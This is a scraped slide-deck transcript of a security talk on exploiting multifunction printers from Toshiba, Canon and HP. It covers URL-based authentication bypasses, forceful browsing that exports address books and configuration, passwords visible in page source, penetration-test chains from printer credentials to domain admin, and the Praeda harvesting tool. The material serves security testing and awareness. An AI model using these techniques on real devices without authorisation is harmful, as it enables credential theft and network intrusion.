Exploiting Vulnerabilities in Multifunction Printers

Uploaded on

403 Labs Consultant Pete Arzamendi discuss the possibilities of exploiting vulnerabilities in multifunction printers.

403 Labs Consultant Pete Arzamendi discuss the possibilities of exploiting vulnerabilities in multifunction printers.

More in: Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads


Total Views
On Slideshare
From Embeds
Number of Embeds



Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

    No notes for slide


  • 1. Exploiting vulnerabilities in Multifunction Printers
    Pete Arzamendi
    Consultant, 403 Labs, LLC
  • 2. Introduction
    Pete Arzamendi
    • Consultant at 403 Labs
    • 3. Both a Qualified Security Assessor (QSA) and a Payment Application Qualified Security Assessor (PA-QSA) for the Payment Card Industry (PCI)
    • 4. Former packet monkey, with over 10 years of experience in the Information Technology field
    • 5. Worked with small, medium businesses, local and state authorities on computer forensic cases and security assessments
    • 6. Hobbies include malware analysis and vulnerably research
    • 7. Member of the foofus.net team
  • Introduction
    403 Labs, LLC
    • Full-service information security and compliance consulting firm headquartered in Milwaukee with additional offices in Chicago and San Francisco
    • 8. Experts in the Payment Card Industry (PCI)
    • 9. Qualified Security Assessor (QSA)
    • 10. Payment Application Qualified Security Assessor (PA-QSA)
    • 11. Approved Scanning Vendor (ASV)
    • 12. PCI Forensics Investigator (PFI) (just approved, expect to be listed shortly)
    • 13. Penetration testing, including web applications
    • 14. Experienced in handling computer forensic investigations
  • Agenda
    • History of printers
    • 15. MFP functions and features
    • 16. MFP flaws and vulnerabilities
    • 17. Leveraging MFP during penetration testing
    • 18. Development of an automated harvesting tool ‘PRAEDA’
    • 19. Q/A
  • Terms and jargon
    • LDAP: The Lightweight Directory Access Protocol is an application protocol for reading and editing directories , A directory in this sense is an organized set of records: for example, a telephone directory is an alphabetical list of persons and organizations with an address and phone number in each "record".
    • 20. SMB: Server Message Block (SMB), mainly used to provide shared access to files, printers, serial ports, and miscellaneous communications between nodes on a network.
    • 21. SMTP: Simple Mail Transfer Protocol (SMTP) is an Internet standard for electronic mail (e-mail) transmission .
    • 22. AD: Active Directory (AD) is a directory service created by Microsoft. Active Directory allows administrators to assign policies, deploy and update software. Active Directory networks can vary from a small installation with a few computers, users and printers to tens of thousands of users, many different network domains and large server farms spanning many geographical locations.
  • History of Multifunction Printers
    • Gary Starkweather is credited with inventing the Laser Printer at Xerox in 1969
    • 23. The first multifunction printer/copier, the "Xerox Printer 100," 1987
    • 24. March 1991 – The HP LaserJet IIISi, the world’s first networked printer
    • 25. The first true multifunction printer/fax/copier were introduced in the early 1990s
    In 2011 you really can’t buy just a printer
  • 26. MFP functions and features
  • 27. MFP functions and features
    • Looking for features and functions that can be leveraged to gain information that could be leveraged in attacking other systems
    • 28. Email
    • 29. Server settings
    • 30. Address books
    • 31. Faxing
    • 32. Contact info
    • 33. User name
    • 34. Address books
  • MFP functions and features
  • Toshiba functions and features
  • 44. Toshiba functions and features
  • 45. Toshiba functions and features
    Network Path
  • 46. Canon functions and features
  • 47. Canon functions and features
  • 48. Canon functions and features
  • 49. Canon functions and features
  • 50. HP functions and features
  • 51. HP functions and features
    HP M4345, 9250, CM6040
  • 52. HP functions and features
  • 53. MFP flaws and vulnerabilities
  • 54. MFP flaws and vulnerabilities
    Security Bypass
    • Various brands and models suffer from a vulnerability allowing bypass of security authentication
    Example: Toshiba e-STUDIO /TopAccess/Administrator/Setup/ScanToFile/List.htm
  • 55. MFP flaws and vulnerabilities
    An extra slash / and full access is allowed
  • 56. MFP flaws and vulnerabilities
    Security Bypass
    Example: Home/Office HP Officejet
  • 57. MFP flaws and vulnerabilities
    Security Bypass
    An extra page=and full access is allowed
  • 58. MFP flaws and vulnerabilities
    Forceful Browsing
    • Gain access to web pages and files by just knowing the correct URL path
    • 59. Typically find that a number of devices, printers and network appliances correctly secure cgi, htm and html extension files, but allow unauthenticated access to other file types
  • MFP flaws and vulnerabilities
    Forceful Browsing
    Canon imageRUNNER
    Export address books
    • AID= can be incremented to download different address books
    • 60. ACLS=1 on imageRUNNER 3000 series
    • 61. ACLS=2 on imageRUNNER 4000 & 5000 series
    • 62. Extract user names
    • 63. Could also contain password
    • 64. Accessible host
  • MFP flaws and vulnerabilities
    Forceful Browsing
    • Canon imageRUNNER
    • 65. Export additional functions http://target:8080/usermode.umd
    • 66. Usermode.umdis a data file containing printer configuration data in plain text
  • MFP flaws and vulnerabilities
    • Information leak - A look at a few examples
    • 67. Toshiba e-STUDIO
    • 68. Canon imageRUNNER
    • 69. HP MFP
  • MFP flaws and vulnerabilities
    Toshiba Information Leak
    Just because the web form shows ●●●●●●●●
    doesn’t mean it’s truly hidden
    Not uncommon to find data viewable within
    the web source as plain text
  • 70. MFP flaws and vulnerabilities
    CanonInformation Leak
    Want to bet this is also viewable in the source?
    Although not directly found in the Password: value field,
    it was still found within a hidden input tag
  • 71. MFP flaws and vulnerabilities
    HP Information Leak
    Once again just need to examine the property
    of the password field
  • 72. What thebad guys are doing…
    Leveraging MFP vulnerabilities
  • 73. Leveraging MFP during
    penetration testing
    • HP to domain admin access
    • 74. HP Color LaserJet CP4025
    • 75. Extract users’ names from color job log
    • 76. User with weak password
    • 77. Access to workstations
    • 78. Domain admin token
  • Leveraging MFP during
    penetration testing
    • Toshiba to payroll
    • 79. Toshiba e-STUDIO
    • 80. Extract password from scan-to-file function
    • 81. Gain access to AD domain
    • 82. Gain access to a number of folders/files/shares
    • 83. Access to one special file share “Payroll backup”
  • Leveraging MFP during
    penetration testing
    • Canon to domain controller
    • 84. Canon imageRUNNER
    • 85. Extract LDAP settings
    • 86. Enumerate domain user info
    • 87. Remote Desktop access to all servers
  • Leveraging MFP during
    penetration testing
    • Fax to pwned
    • 88. OfficeBridge – Fax system
    • 89. First device we found credentials stored on – This is what got this project started
    • 90. Extract password from LDAP settings
    • 91. Account was domain admin account
  • 01/27/11
  • 92. Automating the process
  • 93. Automated harvesting Praeda
    What is Praeda?
    • Latin for robber, plunderer
    • 94. A tool for the purpose of gathering information from network appliances through their web management interfaces
    • 95. Printers
    • 96. Network appliances
    • 97. Beta version written in perl
    • 98. Goal was to create a simplistic tool that was modular
  • Automated harvesting Praeda
  • 99. Automated harvesting Praeda
    DataFile Structure
    P000005|HP Color LaserJet CP3525 Printers|HP-ChaiSOE/1.0|MP0002
    P000006|HP Color LaserJet CP3505 Printers|HP-ChaiSOE/1.0|MP0002|
    P000007||Canon Http Server 2.10|MP0003|MP0004|MP0005
    P000008||Canon Http Server 2.11|MP0003|MP0004|MP0005
    P000009|Home - Phaser 7750GX|Allegro-Software-RomPager/4.10|MP0006
    P000013|Home - Phaser 6360DT|Allegro-Software-RomPager/4.34|MP0006
    P000014|TopAccess|TOSHIBA TEC CORPORATION|MP0007
  • 100. Automated harvesting Praeda
    • We presently enumerate data from a dozen or more different printer types/versions
    • 101. Plan is to grow this to cover as many printers as we can find
    • 102. Looking for other simple methods for identifying printer types, present process involves querying web interface for:
    • 103. Title page
    • 104. Server type
    • 105. Researching encryption methods used by some vendors for backup and clone process outputs
    • 106. HP
    • 107. Xerox
    • 108. Looking into migrating code to Ruby – early stages of conversion started
  • Questions about Praeda
    Pete Arzamendi
    Beta version of Praeda available at
  • 109. Contact Information
    Pete Arzamendi
    403 Labs, LLC